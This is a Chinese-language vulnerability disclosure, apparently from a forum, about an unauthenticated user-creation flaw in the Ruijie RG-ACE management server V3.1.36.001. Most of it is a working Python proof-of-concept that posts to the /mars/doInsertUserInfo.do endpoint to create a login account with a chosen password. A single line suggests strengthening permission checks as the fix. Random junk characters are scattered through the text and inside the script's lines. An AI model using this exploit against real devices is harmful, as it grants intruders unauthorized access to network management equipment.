锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
: m# W6 T) {* y- X1 ]4 q( }' D  I: I( q5 `

6 I- O+ {% X5 Z6 W; n测试的具体版本是
产品名称: 锐捷应用控制引擎
! p8 @8 B! }( [6 M版本号: 3.1.36.001 TC
编译时间: 201104291730

" [% \( y/ ~. y1 }# }0 n3 V0 D
/ U! G" G, L! N" u) X- P4 _漏洞证明：
; H5 A2 _( u; w0 x


' S' f7 d! E- ]1 Y' G8 C


执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
4 F. D. Z6 O2 D6 Y& T("useractionname","addButtonValue"),
- M4 X# k9 u7 ~) S("useropermanager","userManager"),
("userName","t"), #######账号自己加
5 G6 T4 a. V1 ^' X9 z* L("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
$ S- D. P- ?  H6 A0 I, l* b("email",""),
("mobilePhone",""),
("officePhone",""),
; ^& _+ v% d1 Z% V" |* _("addr",""),
  x* g( U# n+ O6 w5 k& M; d& ?("submit","确定"))
urllib2.install_opener(opener)
5 |8 f  p* a! V( G  ?6 S# Gp=urllib2.urlopen(url, urllib.urlencode(post)).read()
$ T3 t& y( }: C- b) C7 S: q( Z6 s; Rprint "Done"

; k9 ?$ o) n: \$ F5 j* [9 }) L7 C登录，连接设备

: j/ V$ B$ M/ n$ b- G
  V0 _/ j. N7 @$ q3 ^' c


默认的管理员admin权限更大点
% {2 s! h8 [/ K" t# {6 Y2 f3 b
" ?% X$ S0 o( t$ _



修复方案：
: H( o9 z2 N) R. D  }3 H( C加强对接口的权限验证
. I# B- V4 C& p- J1 t